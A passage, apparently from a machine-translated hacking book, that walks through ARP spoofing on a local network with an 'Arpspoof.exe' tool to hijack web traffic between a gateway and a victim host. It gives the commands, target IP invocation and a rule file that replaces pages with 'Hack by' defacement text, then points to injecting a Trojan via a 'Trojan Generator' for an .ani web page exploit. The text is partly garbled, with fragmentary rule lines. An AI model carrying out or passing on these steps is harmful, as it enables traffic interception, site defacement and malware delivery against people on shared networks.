ARPSpoof spoofs company webpages to be hacked
- ipconfig /all
- Ping website URL
- Arpspoof.exe/n
|
(Click to view the big picture) Figure 8-39 to obtain the IP address of the gateway Server |
|
(Click to view the larger image) Figure 8-40 export the spoofing rule |
After the command is successfully executed, a file named "job.txt" is generated in the current folder, which is used to define Spoofing rules. Open the "job.txt" file in notepad and you can see the following content in the file:
- ----
- HTTP/1.
- ----
- HTTP/1.1 200 OKServer: CoolDiyers Hack
IISContent-Length: 27Connection:
closeContent-Type: text/htmlHack
by cooldiyer<noframes>
- ----
|
(Click to view the larger image) Figure 8-41. The modified rule File |
The format of the Rule file is as follows:
- ----
- Original string
- ----
- String after replacement
- ----
- ----
- <Hea
- ----
- Hack by glaciers<Noframes>
- ----
- <HEA
- ----
- Hack by glaciers<Noframes>
- ----
- Arpspoof.exe/l
- Arpspoof.exe 192.168.1.1 192.168.1.8 80 1/r job.txt
|
(Click to view the larger image) Figure 8-42 shows the current network configuration. |
|
(Click to view the big picture) Figure 8-43 execute ARP Spoofing |
|
(Click to view the big picture) Figure 8-44 hacked webpage |
"; Enter the URL of the Trojan program below, where the attacker directly creates a website locally, so the Trojan can be directly placed on the attack host.
|
(Click to view the big picture) Figure 8-45 Trojan Generator for Microsoft Ani web page |
|
(Click to view the big picture) Figure 8-46 |